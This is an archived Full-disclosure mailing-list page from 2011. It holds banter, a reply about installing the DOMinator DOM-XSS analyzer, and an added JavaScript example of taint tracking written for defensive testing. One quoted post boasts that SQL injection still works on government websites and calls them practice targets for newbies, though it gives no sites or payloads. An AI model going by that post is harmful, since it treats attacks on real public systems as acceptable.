On Wed, May 18, 2011 at 13:59, root ro...@fibertel.com.ar wrote:

 You can only jailbreak FreeBSD devices.

FreeBSD is dead. Netcraft confirms it.

kmw



Re: [Full-disclosure] Governments Websites Pwned !!

2011-05-18 Thread tc
Didn't you already fail that class Cal?

On Wed, May 18, 2011 at 6:03 PM, Cal Leeming c...@foxwhisper.co.uk wrote:
 Welcome to 101 of stay out of jail.. Today's topic is: How not to piss off
 the govt.
 :|

 On Wed, May 18, 2011 at 8:54 AM, aryan hacky aryan.ha...@gmail.com wrote:

 Lolzz following GOV sites SQL Injection is working from last years. Why
 they don't like to patch it !!
 Pretty lazy people are in government sectors like their lazy jobs.
 Many newbies are learning SQL injection from the Gov. sites :p lolz .. I
 think it is time to wake up ..



 Here All MySQL Version 5 And Version 4 Websites are injected !

 Special Thanks to Silic0n 

 Work Done By @r@yn...


Re: [Full-disclosure] DOMinator - The DOMXss Analyzer Tool - is finally public

2011-05-18 Thread IEhrepus
hi

DOMinator can't work on Firefox 3.6.17?


hitest


2011/5/18 Stefano Di Paola wi...@wisec.it



Re: [Full-disclosure] DOMinator - The DOMXss Analyzer Tool - is finally public

2011-05-18 Thread Stefano Di Paola
Hey IEhrepus

On Wed, 18/05/2011 at 20.34 -0700, IEhrepus wrote:
 
 DOMinator can't work on firefox 3.6.17? 


DOMinator consists of a core and an extension. The core is Firefox with
some custom C/C++ code in order to add a taint flag to JSStrings and deal
with taint propagation.

So, in order to launch DOMinator you have to download the Linux or
Windows version, which is a patched Firefox binary:
http://code.google.com/p/dominator/downloads/detail?name=DOMinator_firefox_3.6.13_Linux_32Bit.tgz
http://code.google.com/p/dominator/downloads/detail?name=DOMinator_firefox_3.6.13_Windows_32Bit.zip

and follow the instructions here:
http://code.google.com/p/dominator/wiki/InstallationInstructions

That means that:
*The extension itself is only part of it*.
*It won't work without the patched Firefox.*

You can have a look at the diff file here:
http://code.google.com/p/dominator/downloads/detail?name=DOMinator_diff.txt

So I'll have to apply that patch to the source code of FF 3.6.17 and
compile it.

As a side note, it has been seen that the Windows version of DOMinator
doesn't work on a 64-bit OS.
I'd suggest the Linux version in that case.

Cheers
Stefano

 
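The tainting model described in the DOMinator announcement and in this reply (a taint flag carried by each string, propagated through string operations, checked at a sink) is easiest to see in a small model. The following is an added example written for this page, not DOMinator's own code or its Firefox patch: the TaintedString class, the simulated location.hash source, the innerHTML sink report and the sample fragment are all constructed for the demo.

```javascript
// Added example, not code from DOMinator or its Firefox patch: a toy model of
// string tainting. Each value carries a taint flag plus the operations that
// produced it, so a sink check can show how untrusted input reached it and a
// tester can judge whether that path is exploitable. Source, sink and the
// simulated page are all constructed here; nothing touches a real DOM.
class TaintedString {
  constructor(value, tainted = false, history = []) {
    this.value = value;       // the plain string the page would see
    this.tainted = tainted;   // true if any part came from an untrusted source
    this.history = history;   // propagation operations, oldest first
  }
  // Untrusted entry point, e.g. location.hash or document.referrer.
  static fromSource(name, value) {
    return new TaintedString(value, true, [`source:${name}`]);
  }
  // Derived value: taint and history flow in from every tainted operand.
  derive(op, value, other) {
    const otherHist = other instanceof TaintedString ? other.history : [];
    const otherTaint = other instanceof TaintedString && other.tainted;
    return new TaintedString(value, this.tainted || otherTaint,
      this.history.concat(otherHist, [op]));
  }
  concat(other) { return this.derive("concat", this.value + other.value, other); }
  substring(s, e) { return this.derive("substring", this.value.substring(s, e)); }
  decode() { return this.derive("decodeURIComponent", decodeURIComponent(this.value)); }
  replace(re, repl) { return this.derive(`replace(${re})`, this.value.replace(re, repl)); }
}

// A sink check returns a report instead of writing to the DOM; in a browser
// the same check would wrap Element.innerHTML, document.write and friends.
function checkSink(sink, ts) {
  return { sink, tainted: ts.tainted, value: ts.value, trace: ts.history.join(" -> ") };
}

// Simulated page logic: read "#name=<value>" from the fragment and render it.
// With sanitize=true the page strips angle brackets first; the trace still
// records the replace so a reviewer can decide whether that filter is enough.
function renderGreeting(rawHash, sanitize) {
  const hash = TaintedString.fromSource("location.hash", rawHash);
  let name = hash.substring(hash.value.indexOf("=") + 1).decode();
  if (sanitize) name = name.replace(/[<>]/g, "");
  const html = new TaintedString("<h1>Hello ").concat(name)
    .concat(new TaintedString("</h1>"));
  return checkSink("innerHTML", html);
}

// Constructed sample fragment (a URL an attacker could influence).
const SAMPLE_HASH = "#name=%3Cb%3EMallory%3C%2Fb%3E";
console.log(renderGreeting(SAMPLE_HASH, false));
console.log(renderGreeting(SAMPLE_HASH, true));
```

The sanitized path stays tainted on purpose: the tool's job is to surface the full propagation chain, and the tester decides whether the replace in the trace is an adequate filter for the sink it reaches.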


Re: [Full-disclosure] Linux kernel 2011 local root does it exist

2011-05-18 Thread gold flake
As long as there are postmen and this stratospheric level of
discussion on FD, there is zest in life.
